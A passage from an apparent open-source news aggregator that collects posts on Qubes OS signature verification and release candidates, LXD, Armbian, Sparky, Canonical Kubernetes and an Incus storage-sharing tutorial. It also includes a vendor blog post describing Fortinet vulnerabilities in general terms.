Tag for commit 266e14a6fae57c9a91362c9ac784d3a891f4d351
gpg: Signature made Thu 02 Mar 2023 03:52:04 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
The exact output will differ, but the final line should always start with gpg: Good signature from...
followed by an appropriate key. The [full]
indicates full trust, which this key inherits in virtue of being validly signed by the QMSK.
Verify PGP signatures, e.g.:
$ cd QSBs/
$ gpg --verify qsb-087-2022.txt.sig.marmarek qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 04:05:51 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify qsb-087-2022.txt.sig.simon qsb-087-2022.txt
gpg: Signature made Wed 23 Nov 2022 03:50:42 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
$ cd ../canaries/
$ gpg --verify canary-034-2023.txt.sig.marmarek canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 03:51:48 AM PST
gpg: using RSA key 2D1771FE4D767EDC76B089FAD655A4F21830E06A
gpg: Good signature from "Marek Marczykowski-Górecki (Qubes security pack)" [full]
$ gpg --verify canary-034-2023.txt.sig.simon canary-034-2023.txt
gpg: Signature made Thu 02 Mar 2023 01:47:52 AM PST
gpg: using RSA key EA18E7F040C41DDAEFE9AA0F4AC18DE1112E1490
gpg: Good signature from "Simon Gaiser (Qubes Security Pack signing key)" [full]
Again, the exact output will differ, but the final line of output from each gpg --verify
command should always start with gpg: Good signature from...
followed by an appropriate key.
For this announcement (QSB-101), the command is:
$ gpg --verify qsb-101-2024.txt.sig.simon qsb-101-2024.txt
You can also verify the signature directly from this announcement in addition to or instead of verifying the files from the qubes-secpack. Simply copy and paste the QSB-101 text into a plain text file and do the same for the signature file. Then, perform the same authentication steps as listed above, substituting the filenames above with the names of the files you just created.
We’re pleased to announce that the first release candidate (RC) for Qubes OS 4.2.1 is now available for testing. This patch release aims to consolidate all the security patches, bug fixes, and other updates that have occurred since the release of Qubes 4.2.0. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO. The ISO and associated verification files are available on the downloads page. For more information about the changes included in this version, see the full list of issues completed since the release of 4.2.0.
That depends on the number of bugs discovered in this RC and their severity. As explained in our release schedule documentation, our usual process after issuing a new RC is to collect bug reports, triage the bugs, and fix them. If warranted, we then issue a new RC that includes the fixes and repeat the process. We continue this iterative procedure until we’re left with an RC that’s good enough to be declared the stable release. No one can predict, at the outset, how many iterations will be required (and hence how many RCs will be needed before a stable release), but we tend to get a clearer picture of this as testing progresses. Here is the latest update:
At this point, we expect the stable release sometime around 2024-03-25.
If you’re willing to test this new RC, you can help us improve the eventual stable release by reporting any bugs you encounter. We encourage experienced users to join the testing team. The best way to test Qubes 4.2.1-rc1 is by performing a clean installation with the new ISO. We strongly recommend making a full backup beforehand.
As an alternative to a clean installation, there is also the option of performing an in-place upgrade without reinstalling. However, since Qubes 4.2.1 is simply Qubes 4.2.0 inclusive of all updates to date, this amounts to simply using a fully-updated 4.2.0 installation. In a sense, then, all current 4.2.0 users who are keeping up with updates are already testing 4.2.1-rc1, but this testing is only partial, since it does not cover things like the installation procedure.
As a reminder, we published the following special announcement in Qubes Canary 032 on 2022-09-14:
We plan to create a new Release Signing Key (RSK) for Qubes OS 4.2. Normally, we have only one RSK for each major release. However, for the 4.2 release, we will be using Qubes Builder version 2, which is a complete rewrite of the Qubes Builder. Out of an abundance of caution, we would like to isolate the build processes of the current stable 4.1 release and the upcoming 4.2 release from each other at the cryptographic level in order to minimize the risk of a vulnerability in one affecting the other. We are including this notice as a canary special announcement since introducing a new RSK for a minor release is an exception to our usual RSK management policy.
As always, we encourage you to authenticate this canary by verifying its PGP signatures. Specific instructions are also included in the canary announcement.
As with all Qubes signing keys, we also encourage you to authenticate the new Qubes OS Release 4.2 Signing Key, which is available in the Qubes Security Pack (qubes-secpack) as well as on the downloads page.
A release candidate (RC) is a software build that has the potential to become a stable release, unless significant bugs are discovered in testing. RCs are intended for more advanced (or adventurous!) users who are comfortable testing early versions of software that are potentially buggier than stable releases. You can read more about Qubes OS supported releases and the version scheme in our documentation.
The Qubes OS Project uses the semantic versioning standard. Version numbers are written as <major>.<minor>.<patch>
. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.2) inclusive of all updates up to a certain point. (See supported releases for a comprehensive list of major and minor releases.) Installing the initial Qubes 4.2.0 release and fully updating it results in essentially the same system as installing Qubes 4.2.1. You can learn more about how Qubes release versioning works in the version scheme documentation.
Video Read-through of 2023 Year End Financial Update: Slides and Transcript Welcome to Purism’s Investor Report Fiscal Year End 2023. In this report we’re going to go through an executive summary, profit and loss statement, balance sheet, and then conclusion. Executive Summary: All crowdfunded products have been delivered. This is important because the Librem 5 […]
The post 2023 Finance Report: Profitable, More Assets than Liabilities, Over $9m in Sales, 50% Margin appeared first on Purism.
15 March, 2024 05:50PM by Todd Weaver
Dear Armbian Community,
Here are the latest news!
With each new Armbian release, we bring you plenty of improvements. However, we also encounter some new bugs along the way. While some are our own doing, most come from various sources. Much of the software we distribute is common and maintained by third parties upstream, with our main focus on single board computers.
Challenges and Improvements
During the first week after the release, we faced some problems with the package repository. Our system is highly automated, but sometimes things don’t go smoothly. While trying to improve things, we accidentally caused a delay in updates for two weeks. We’re working hard to fix these issues and make our processes smoother for the future.
Rockchip Kernel Developments
We’ve been busy improving Rockchip vendor kernels, and we’re currently working on porting and testing their new 6.1.y release.
KDE Plasma Desktop Integration
Even though we were in the final stages of our release cycle, we managed to include the brand new release of the KDE Plasma desktop. Now, all supported boards come with KDE Plasma Neon v6.1 desktop images, based on the Ubuntu package base. These images offer the latest stable Armbian kernels and LTS package base, without the bloatware or Snap, giving you the best desktop experience.
Documentation Enhancement Initiative
We’re committed to improving our documentation. We’ve updated our Pull Request templates to make it easier for people to contribute. If you’re interested in helping us improve our documentation, join our upcoming Documentation Follow-up Meeting for more collaboration.
Stay tuned for more updates and improvements!
The Armbian team.
15 March, 2024 09:48AM by Igor Pečovnik
The stable release of LXD, the system container and VM manager, is now available. LXD 5.21 is the fifth LTS release for LXD, and will be supported for 5 years, until June 2029. This release significantly steps up LXD’s abilities in comparison to LXD 5.0 LTS, especially when operating in clustered environments. LXD 5.21.0 will be licensed under AGPL-3.0-only, in line with the change we announced last year. The conditions of the license are designed to encourage those looking to modify the software to contribute back to the project and the broader community. We hope you’ll enjoy what’s in store in this release. Before we jump into features, let’s start with some general changes that come with the new LTS.
Starting with this release we are changing the numbering scheme. This is the first LTS release that won’t use the n.0.n format, e.g. 6.0.x, and instead it will be 5.21.x.
What we have followed so far is that each LTS would start a new major version (e.g. 5.0) and each monthly feature release would build on that major version (e.g. 5.1. … 5.20). However, that seemed strange from the perspective of the LTS being an accumulation of all the work that has gone into the monthly releases over the past two years. This is why we decided to change the naming scheme to better reflect that the LTS represents the end of the cycle, rather than the beginning.
Going forward, the last of the monthly releases in the two-year LTS cycle will become the next LTS, in this case, 5.21.0. Then, we will restart the cycle with the first monthly release following the new major version number (e.g. 6.x). To avoid unexpected results for people who assumed the next LTS series would be 6.0.x we will not be releasing LXD 6.0, and the next feature release after this one will be LXD 6.1.
As we announced, we now have a dedicated team working on the LXD graphical user interface. We are happy to share that the LXD UI is deemed production grade and is now enabled by default in the LXD snap. We will continue to work on ensuring feature parity of the UI with the CLI.
Keep in mind that the external listener must still be enabled explicitly by setting core.https_address as outlined in the documentation.
Over the past two years, we have steadily been enhancing LXD capabilities to become an even more robust and featureful infrastructure tool. In addition to general features, some of the areas we are addressing are aimed at clustered environments, such as when deploying our newly launched MicroCloud solution, which builds on LXD.
As part of a push to provide a more industry-standard solution to authentication and authorization in LXD, we’ve added support for OpenID Connect for authentication and additional mechanisms for fine-grained authorization. The combination of these features will allow users to perform secure authentication and fine-grained access control. With the features completed in LXD, this will also be added to the UI in the coming months.
Please note that due to the change in the database, all users who currently authenticate to LXD with OIDC will temporarily lose access to their cluster, and will have to follow these steps to authenticate.
More information is available in the documentation about OIDC and fine-grained authorization.
As part of this work, the support for Canonical’s Candid RBAC service has been removed as it is in the process of being deprecated. LXD still supports external OIDC and TLS certificates for authentication.
To cover a wider variety of use cases, we are continuously evaluating adding new storage options and enhancing existing ones. In this LTS, we added support for object storage as well as support for Dell PowerFlex as another option for remote storage.
LXD now has support for object storage.
We’ve achieved this by adding a whole new concept of storage buckets along with a dedicated command (lxc storage bucket) and APIs. This allows LXD users to create new storage buckets, assign them a size limit and then manage access keys to that bucket. The bucket has its own URL with an S3 API.
For Ceph, we are using its rados gateway providing the S3 API.
For other storage drivers, we are using MinIO project, which lets us offer an S3 compatible API directly from a local storage driver. Please note that this requires an externally provided MinIO server binary, by setting the minio.path setting.
Documentation: How to manage storage buckets and keys and Ceph Object storage driver
There are various enablement activities between Dell and Canonical as a part of our ongoing partnership. The latest of them is adding support for LXD to interface directly with its PowerFlex service in order to allow LXD instances to be run on its platform. This offers an alternate remote storage option for enterprise use cases, where currently supported storage drivers may not be preferred.
Due to its design, PowerFlex is another LXD storage driver offering remote storage capabilities similar to the already existing implementation for Ceph RBD.
More information can be found in the documentation.
Since introducing support for virtual machines 4 years ago we’ve been adding a variety of features to not only ensure feature parity with system containers but also make sure to cover a wide range of our user’s use cases. Some of the highlights for this LTS are support for live migration, non-UEFI VMs and ISO volumes, as well as enabling AMD SEV.
This release enables a much-improved VM live migration process, eliminating much of the perceivable downtime. Previously, LXD relied on the stateful stop function, which is the ability to write all the running memory and CPU state to disk, then stop the virtual machine, move it to a new system and start it back up again from where it was using the stored state. The improved functionality, on the other hand, allows the source and target servers to communicate right from the start of the migration. This allows for performing any state transfer in the background directly to the target host while the VM is still running, then transferring any remaining disk changes as well as the memory through multiple iterations of the migration logic and finally cutting over to the target system.
Documentation: Live migration for virtual machines
LXD now supports AMD SEV for memory encryption of virtual machines.
On compatible systems (AMD EPYC with firmware and kernel support enabled), setting security.sev to true will have the VM get its memory encrypted with a per-VM key handled by the firmware.
Systems supporting AMD SEV-ES can then turn on security.sev.policy.es to also have the CPU state encrypted for extra security.
Lastly, LXD also supports feeding custom session keys. Combined with LXD’s existing vTPM support, this feature can be used to ensure that the firmware is set up with those user provided keys and that the host operator doesn’t have any ability to tamper with the VM.
Documentation: Instance security options
LXD virtual machines have been designed to use a very modern machine definition from the start. This means LXD VMs offer a QEMU Q35 machine type combined with a UEFI firmware (EDK2) and even Secure Boot enabled by default.
While this works great for modern operating systems, it can be a problem when migrating existing physical or virtual machines into LXD as those machines may be using a legacy firmware (BIOS) and not be bootable under UEFI.
This can now be addressed by setting security.csm to true combined with disabling UEFI Secure Boot by setting security.secureboot to false. This switches QEMU to boot via Seabios directly rather than through EDK2.
Documentation: Security CSM
It is now possible to upload ISO image files as custom storage volumes. These can then be attached to a virtual machine as a bootable CD disk allowing simplified installation of custom operating systems from a “library” of custom ISO volumes.
Documentation: Launch a VM that boots from an ISO
The instance placement scriptlet feature was added to enable a better alternative to LXD’s default instance placement algorithms. Instead of the default behavior of placing a new instance on whichever cluster member was hosting the fewest instances, this new feature allows users to make a more deliberate choice. Now, users can provide a Starlark scriptlet that decides which cluster member to deploy the new instance on based on information about the new requested instance as well as a list of candidate cluster members. Importantly, while scriptlets are able to access certain information about the instance and the cluster, they cannot access any local data, hit the network or even perform complex time-consuming actions.
Documentation: Instance placement scriptlet
A commonly requested feature by those using LXD with Ceph and OVN, it’s now possible to have LXD automatically recover from a cluster member failure by effectively evacuating all instances to other systems.
This can only work with Ceph backed instances which don’t rely on any server-specific device or configuration.
This is controlled by a new cluster.healing_threshold which defines a number of seconds after which a cluster member is considered to be offline and its instances relocated.
Documentation: Automatic cluster evacuation
Following the removal of shiftfs from the Ubuntu kernel (from Mantic onwards) LXD has now also dropped support for shiftfs. The preferred way for container filesystems to have their UID/GID mappings dynamically shifted is with idmapped mounts. In recent kernels this is now supported for ZFS and Cephfs filesystem (in addition to the long standing support for ext4, xfs and btrfs filesystem).
The features outlined above are only the major highlights of this release. You can read the detailed announcement with a complete changelog on our discourse.
To get started with LXD, follow the get started guide.
Learn more about LXD on the LXD webpage.
For several years in a row, the Californian manufacturer Fortinet has been in the public focus due to serious security problems. Known for its secure firewall, VPN and intrusion detection devices, the cyber security expert was again forced to announce several highly critical security vulnerabilities in February 2024.
Staying informed and applying patches promptly is what companies need to proactively protect themselves against such attacks. Products such as Greenbone’s Enterprise Appliances play a central role in this and are meant to help admins. All the vulnerabilities mentioned in this blog post are covered by tests from the Greenbone Enterprise Feed: active procedures check whether the exploit is possible, and versioning tests will deliver results about the success of patch management.
87,000 passwords: Fortinet wins “Vulnerability of the Year 2022”
In 2019, CVE-2018-13379 (CVSS 9.8) allowed over 87,000 passwords for the Fortinet VPN to be read from the devices. In the following years, this vulnerability was exploited so successfully that in 2022 it was awarded the dubious title of “most exploited vulnerability of 2022“. The US authorities reacted and urged all of their clients to be more aware of the problem: Both U.S. Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA) and the Federal Bureau of Investigation (FBI) warned about the fact that many customers did not apply patches promptly. Again, lack of foresight turned out to be one of the main reasons. Patching, so the agencies, would have prevented many of successful attacks.
2023: Unwanted guests in critical networks
What makes it worse, is the fact that Fortinet devices are mostly being used in security-critical areas. Unpatched and equipped with serious vulnerabilities, such devices have become the focus of attackers in recent years, especially by state actors. In 2023, for example, Chinese hacker groups successfully infiltrated Dutch military networks via a vulnerability in the FortiOS SSL VPN from December 2022 that actually had already been patched for a while (CVE-2022-42475, CVSS 9.3).
Even though the network was only used for research and development according to the Military Intelligence and Security Service (MIVD), the attacks published at the beginning of February made it clear how easy it is for attackers to penetrate even highly protected networks. Even worse so, the corresponding backdoor “Coathanger” allows attackers to gain permanent access to devices once they have been hacked, all thanks to the vulnerability 2022-42475, which allows the execution of arbitrary code.
February 2024: Warnings of further vulnerabilities, maximum severity
Unfortunately, the story does not end here: Fortinet also had to admit another serious vulnerability, beginning of February 2024: CVE-2024-21762 (CVSS score: 9.6) allows unauthorized attackers to execute arbitrary code via specially adapted requests. A long list of versions of the Fortinet operating system FortiOS and FortiProxy are affected. The manufacturer advises upgrading or deactivating the SSL VPN and warns of both the severity of the vulnerability and the fact that it is already being massively exploited by attackers.
Fortinet seemed to have some organizational issues, too. Just as bad as the above sounded CVE-2024-23108 and CVE-2024-23109, published just a few days later, which also allow unauthenticated attackers to execute arbitrary code. However, these CVEs have to be taken with a grain of salt: The fact that two CVEs from the same manufacturer received a 10.0 on the threat severity scale on the same day is probably unique and raised some experts’ eyebrows. Apart from that, the confusing communication from the vendor was not really likely to establish or further trust, similarly to the strange story of toothbrush-based attacks told by a Fortinet employee, reaching the mass media at the same time.
Fatal combination – vulnerability management can help
As always, Fortinet published patches promptly, but customers also have to install them. Again, the combination of serious security vulnerabilities, lack of awareness and the absence of patches showed its full impact: Only a few days later the US government pushed out another advisory from CISA, NSA and FBI about Volt Typhoon, a Chinese state hacker group. The US government had evidence that these attackers have permanently nested in critical infrastructure of US authorities for many years via such vulnerabilities – the associated risks should not be underestimated, according to the warning.
The security by design required there also includes the constant monitoring of one’s own servers, computers and installations with vulnerability tests such as those of Greenbone Enterprise Appliances. Those who constantly monitor their networks (not just Fortinet devices) with the vulnerability tests of a modern vulnerability scanner can inform their administrators as quickly as possible if known CVEs in an infrastructure are waiting for patches, reducing the attack surface.
15 March, 2024 06:57AM by Markus Feilner
Hello, Community!
VyOS 1.4.0-epa2 image is now available to customers and contributors (and everyone can build it from the sagitta branch of vyos-build, of course)! If you are new to VyOS, the "EPA" part means "early production access" — the final stage when the release is already used in production by a subset of users and on our proper infrastructure. This is the second release on the path to the final stabilization of the 1.4.0/Sagitta branch. It mainly features bug fixes but contains minor features
15 March, 2024 12:36AM by Daniil Baturin (daniil@sentrium.io)
The 3rd update of Sparky 7 – 7.3 is out.
It is a quarterly updated point release of Sparky 7 “Orion Belt” of the stable line. Sparky 7 is based on and fully compatible with Debian 12 “Bookworm”.
Changes:
– all packages updated from Debian and Sparky stable repos as of March 13, 2024
– Linux kernel PC: 6.1.67 LTS (6.8.0, 6.6.21-LTS & 5.15.151-LTS in sparky repos)
– Linux kernel ARM: 6.6.20 LTS
– LibreOffice 7.4.7
– KDE Plasma 5.27.5
– LXQt 1.2.0
– MATE 1.26
– Xfce 4.18
– Openbox 3.6.1
– Firefox 115.8.0esr (123.0.1-sparky in sparky repos)
– Thunderbird 115.8.0
– VLC 3.0.20
– Exaile 4.1.3
– added new application (amd64 only): Noi – a chatboot GUI application with support for ChatGPT, Claude, Bard, Poe, Perplexity, Copilot, HuggingChat, Pi, Coze and YOU.
Sparky 7.3 “Orion Belt” is available in the following versions:
– amd64 BIOS/UEFI+Secure Boot: Xfce, LXQt, MATE, KDE Plasma, MinimalGUI (Openbox) & MinimalCLI (text mode)
– i686 non-pae BIOS/UEFI (Legacy): MinimalGUI (Openbox) & MinimalCLI (text mode)
– ARMHF & ARM64 Openbox & CLI
Make sure that the ‘os-prober’ will be not executed to detect other bootable partitions as default, but Sparky provides a GRUB option to detect other OSes anyway.
But, a next updating of GRUB packages override the option.
To fix that manually, add the line:
GRUB_DISABLE_OS_PROBER=false
on the end of the file (as root):
/etc/default/grub
Then update grub:
sudo update-grub
PC live user:password = live:live
ARM user:password = pi:sparky
If you have Sparky 7 installed – simply keep it up to date. No need to reinstall your OS.
New iso images of Sparky 7 “Orion Belt” can be downloaded from the download/stable page
Informacja o wydaniu w języku polskim: https://linuxiarze.pl/sparky-7-3/
14 March, 2024 09:17PM by pavroo
Kubernetes revolutionised container orchestration, allowing faster and more reliable application deployment and management. But even though it transformed the world of DevOps, it introduced new challenges around security maintenance, networking and application lifecycle management.
Canonical has a long history of providing production-grade Kubernetes distributions, which gave us great insights into Kubernetes’ challenges and the unique experience of delivering K8s that match the expectations of both developers and operations teams. Unsurprisingly, there is a world of difference between them. Developers need a quick and reproducible way to set up an application environment on their workstations. Operations teams with clusters powering the edge need lightweight high-availability setups with reliable upgrades. Cloud installations need intelligent cluster lifecycle automation to ensure applications can be integrated with each other and the underlying infrastructure.
We provide two distributions, Charmed Kubernetes and MicroK8s, to meet those different expectations. Charmed Kubernetes wraps upstream K8s with software operators to provide lifecycle management and automation for large and complex environments. It is also the best choice if the Kubernetes cluster has to integrate with custom storage, networking or GPU components. Microk8s has a thriving community of users; it is a production-grade, ZeroOps solution that powers laptops and edge environments. It is the simplest way to get Kubernetes anywhere and focus on software product development instead of working with infrastructure routines and operations.
After providing Kubernetes distributions for over seven years, we decided to consolidate our experience into a new distribution that combines the best of both worlds: ZeroOps for small clusters and intelligent automation for larger production environments that also want to benefit from the latest community innovations.
Canonical Kubernetes will be our third distribution and an excellent foundation for future MicroK8s and Charmed Kubernetes releases. You can find its beta in our Snap Store under the simple name k8s. We based it on the latest upstream Kubernetes 1.30 beta, which officially came out on 12 March. It will be a CNCF conformant distribution with an enhanced security posture and best-in-class open source components for the most demanding user needs: network, DNS, metrics server, local storage, ingress, gateway, and load balancer.
Canonical Kubernetes is easy to install and easy to maintain. Like MicroK8s, Canonical Kubernetes is installed as a snap, giving developers a great installation experience and advanced security features such as automated patch upgrades. Adding new nodes to your cluster comes with minimum hassle. It also provides a quick way to set up high availability.
You need two commands to get a single node cluster, one for installation and another for cluster bootstrap. You can try it out now on your console by installing the k8s snap from the beta channel:
sudo snap install k8s --channel=1.30-classic/beta --classic
sudo k8s bootstrap
If you look at the status of your cluster just after bootstrap – with the help of the k8s status command – you might immediately spot that the network, dns, and metrics-server are already running. In addition to those three, Canonical Kubernetes also provides local-storage, ingress, gateway, and load-balancer, which you can easily enable. Under the hood, these are powered by Cilium, CoreDNS, OpenEBS, and Metrics Server. We bundle these as built-in features to ensure tight integration and a seamless experience. We want to emphasise standard Kubernetes APIs and abstractions to minimise disruption during upgrades while enabling the platform to evolve.
All our built-in features come with default configurations that make sense for the most popular use cases, but you can easily change them to suit your needs.
Typical application development flows start with the developer workstation and go through CI/CD pipelines to end up in the production environment. These software delivery stages, spanning various environments, should be closely aligned to enhance developer experience and avoid infrastructure configuration surprises as your software progresses through the pipeline. When done right, you can deploy applications faster. You also get better security assurance as everyone can use the same K8s binary offered by the same vendor across the entire infrastructure software stack.
When you scale up from the workstation to a production environment, you will inevitably be exposed to a different class of problems inherent to large-scale infrastructure. For instance, managing and upgrading cluster nodes becomes complicated and time-consuming as the number of nodes and applications grows. To provide the smooth automation administrators need, we offer Kubernetes lifecycle management through Juju, Canonical’s open source orchestration engine for software operators.
If you have Juju installed on your machine already, a Canonical Kubernetes cluster is only a single command away:
juju deploy k8s --channel edge
By letting Juju Charm automate your lifecycle management, you can benefit from its rich integration ecosystem, including the Canonical Observability Stack.
Security is critical to any Kubernetes cluster, and we have addressed it from the beginning. Canonical Kubernetes 1.30 installs as a snap with a classic confinement level, enabling automatic patch upgrades to protect your infrastructure against known vulnerabilities. Canonical Kubernetes will be shipped as a strict snap in the future, which means it will run in complete isolation with minimal access to the underlying system’s resources. Additionally, Canonical Kubernetes will comply with security standards like FIPS, CIS and DISA-STIG.
Critical functionalities we have built into Canonical Kubernetes, such as networking or dns, are shipped as secure container images maintained by our team. Those images are built with Ubuntu as their base OS and benefit from the same security commitments we make on the distribution.
While it is necessary to contain core Kubernetes processes, we must also ensure that the user or operator-provided workloads running on top get a secure, adequately controlled environment. Future versions of Canonical Kubernetes will provide AppArmor profiles for the containers that do not inherit the enhanced features of the underlying container runtime. We will also work on creating an allowlist for kernel modules that can be loaded using the Kubernetes Daemonsets. It will contain a default list of the most popular modules, such as GPU modules needed by AI workloads. Operators will be able to edit the allowlist to suit their needs.
We would love for you to try all the latest features in upstream Kubernetes through our beta. Get started by visiting http://documentation.ubuntu.com/canonical-kubernetes
Besides getting a taste of the features I outlined above, you’ll be able to try exciting changes that will soon be included in the upcoming upstream GA release on 17 April 2024. Among others, CEL for admission controls will become stable, and the drop-in directory for Kubelet configuration files will go to the beta stage. Additionally, Contextual logging and CRDValidationRatcheting will graduate to beta and be enabled by default. There are also new metrics, such as image_pull_duration_seconds, which can tell you how much time the node spent waiting for the image.
We want Canonical Kubernetes to be a great K8s for everyone, from developers to large-scale cluster administrators.
Try it out and let us know what you think. We would love your feedback! You can find contact information on our community page.
We’ll also be available at KubeCon in Paris, at booth E25 – if you are there, come and say hi.
Incus is a manager for virtual machines and system containers.
A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container uses, instead, security primitives of the Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines.
In this post we are going to see how to conveniently manage the files of several Incus containers from a separate Incus container. The common use-case is that you have several Incus containers that each one of them is a Website and you want your Web developer to have access to the files from a central location with either FTP or SFTP. Ideally, that central location should be an Incus container as well.
Therefore, we are looking on how to share storage between containers. The other case that we are not looking here, is how to share storage between the host and the containers.
We are creating several Incus containers and each one of them is a separate web server. Each web server expects to find the Web content files in the /var/www/
directory. Then, we want to create a separate container for the Web developer in order to give access to those /var/www/
directories from some central location. The Web developer will get access to that specific container and only that container. As Incus admins we are supposed to provide access to the Web developer to that specific container through SSH or FTP.
In this setup, the Incus container for the web server is webserver1
and the Web developer’s container is called webdev
.
We will be creating storage volumes for each web server from the Incus storage pool, then incus attach
those volumes to both the corresponding web server container and the Web developer’s container.
webserver1
First we create the web server container, webcontainer1
, and install the web server package. By default, the nginx web server creates a directory html
into /var/www/
for our default Web server. In there we will be attaching in the next+3 step the storage volume to store the files for this web server .
$ incus launch images:debian/12/cloud webserver1
Launching webserver1
$ incus exec webserver1 -- su --login debian
debian@webserver1:~$ sudo apt update
...
debian@webserver1:~$ sudo apt install -y nginx
...
debian@webserver1:~$ cd /var/www/
debian@webserver1:/var/www$ ls -l
total 1
drwxr-xr-x 2 root root 3 Mar 14 08:34 html
debian@webserver1:/var/www$ ls -l html/
total 1
-rw-r--r-- 1 root root 615 Mar 14 08:34 index.nginx-debian.html
debian@webserver1:/var/www$
webdev
Then, we create the Incus container for the Web developer. Ideally, you should provide access to this container to your Web developer through SSH/SFTP. Use incus config device add
to create a proxy device in order to give access to your Web developer. Here, we create a WEBDEV
directory in the home directory of the default debian
user account of this container. In there, in the next step, we will be attaching the separate storage volumes of each web server.
$ incus launch images:debian/12/cloud webdev
Launching webdev
$ incus exec webdev -- su --login debian
debian@webdev:~$ pwd
/home/debian
debian@webdev:~$ mkdir WEBDEV
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:28 WEBDEV
debian@webdev:~$
When you launch an Incus container, you get automatically a single storage volume for the files of that container. We are treating ourselves and we create an extra storage volume for the web data. But let’s learn a bit about storage, storage pools and storage volumes.
We run incus storage list
to get a list of storage pools for our installation. In this case, the storage pool is called default
(name), we are using ZFS for storage (driver), and the ZFS pool (source) is called default
as well. For the last part, you can run zpool list
to verify the ZFS pool details. For the USED BY
number of 89 in this example, you can verify it from the output of zfs list
.
$ incus storage list
+---------+--------+---------+-------------+---------+---------+
| NAME | DRIVER | SOURCE | DESCRIPTION | USED BY | STATE |
+---------+--------+---------+-------------+---------+---------+
| default | zfs | default | | 89 | CREATED |
+---------+--------+---------+-------------+---------+---------+
$ zpool list
NAME SIZE ALLOC FREE CKPOINT EXPANDSZ FRAG CAP DEDUP HEALTH ALTROOT
default 512G 136.9G 375.1G - - 8% 18% 1.00x ONLINE -
$
We run incus storage volume list
to get a list of the storage volumes in Incus. I am not show the output here because it’s big. The first column is the type of the storage volume, either
container
, one per system container, image
, for each cache image from a remote like images.linuxcontainers.org, virtual-machine
, for each virtual machine, orcustom
, for those created by ourselves as we are going to do in a moment.The fourth column is the content-type of a storage volume, and this can be either filesystem
or block
. The default when creating storage volumes is filesystem
and we will be creating filesystem
in a bit.
webdata1
storage volumeNow we are ready to create the webdata1
storage volume. In the functionality of the incus storage volume
, we use the create
command to create on the default
storage pool the webdata1
storage volume, which is of type filesystem
.
$ incus storage volume create default webdata1 --type=filesystem
Storage volume webdata1 created
$
webdata1
storage volume to the web server containerNow we can attach the webdata
storage volume to the webserver1
container. In the functionality of the incus storage volume
, we use the attach
command to attach
from the default
storage pool the webdata1
storage volume to the webserver1
container, and mount it over the /var/www/html/
path.
$ incus storage volume attach default webdata1 webserver1 /var/www/html/
$
webdata1
storage volume to the webdev containerNow we can attach the webdata
storage volume to the webdev
container. In the functionality of the incus storage volume
, we use the attach
command to attach
from the default
storage pool the webdata1
storage volume to the webdev
container, and mount it over the /home/debian/WEBDEV/
path.
$ incus storage volume attach default webdata1 webdev /home/debian/WEBDEV/webserver1
$
webserver1
We have attached the storage volume into both the web server container and the web development container. Let’s setup the initial permissions and setup some simple hello world HTML file. We get a shell into the web development container webdev
, and observe that the storage volume has been mounted. The default permissions are drwxr-xr-x
and we replace them into drwxr-xr-x
. That is, we can list the contents of the directory. Then, we changed the owner:group into debian:debian
in order to allow all access to the Web developer when they edit the files.
$ incus exec webdev -- su --login debian
debian@webdev:~$ ls -l
total 1
drwxr-xr-x 3 debian debian 3 Mar 14 10:33 WEBDEV
debian@webdev:~$ cd WEBDEV/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwx--x--x 2 root root 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$ sudo chmod 755 webserver1/
debian@webdev:~/WEBDEV$ sudo chown debian:debian webserver1/
debian@webdev:~/WEBDEV$ ls -l
total 1
drwxr-xr-x 2 debian debian 2 Mar 14 09:59 webserver1
debian@webdev:~/WEBDEV$
Still in the webdev
container, we create an initial HTML file. Note that once you paste the HTML code, you press Ctrl+d to save the index.html
file.
debian@webdev:~/WEBDEV$ cd webserver1
debian@webdev:~/WEBDEV/webserver1$ cat > index.html
<!DOCTYPE HTML>
<html>
<head>
<title>Welcome to Incus</title>
<meta charset="utf-8" />
</head>
<style>
body {
background: rgb(2,0,36);
background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(9,9,121,1) 35%, rgba(0,212,255,1) 100%);
}
h1,p {
color: white;
text-align: center;
}
</style>
<body>
<h1>Welcome to Incus</h1>
<p>The web development data of this web server are stored in an Incus storage volume. </p>
<p>This storage volume is attached to both the web server container and a web development container. </p>
</body>
</html>
Ctrl+d
debian@webdev:~/WEBDEV/webserver1$ ls -l
total 1
-rw-r--r-- 1 debian debian 608 Mar 14 11:05 index.html
debian@webdev:~/WEBDEV/webserver1$ logout
$
We visit the web server using our browser. The IP address of the web server is obtained as follows.
$ incus list webserver1 -c n4
+------------+--------------------+
| NAME | IPV4 |
+------------+--------------------+
| webserver1 | 10.10.10.88 (eth0) |
+------------+--------------------+
$
This is the HTML page we created.
We showed how to use a storage volume to separate the web server data files from the web server container. Those files are stored in the Incus storage pool. We attached the same storage volume to a separate container for the Web developer so that they get access to the files and only the files from a central location, the webdev
container.
An additional task would be to setup git
in the webdev
container so that any changes to the web files are tracked.
You can also detach
storage volumes (no shown here).
You would use incus config device
to create a proxy device to give external access to the Web developer. Preferably over SSH/SFTP, instead of just plain FTP. In fact in terms of usability it does not make a difference between the two. Yeah, please use SFTP. All web development tools should support SFTP.
Canonical is delighted to be a technology partner at the Data Innovation Summit (DIS) in 2024. We are proud to showcase our Data and AI solutions through our conference talk and technology in practice sessions. The event will take place in Kistamässan, Stockholm on April 24-25, 2024. Visit us at booth C71 to learn how open source data and AI solutions can help you take your models to production, from edge to cloud.
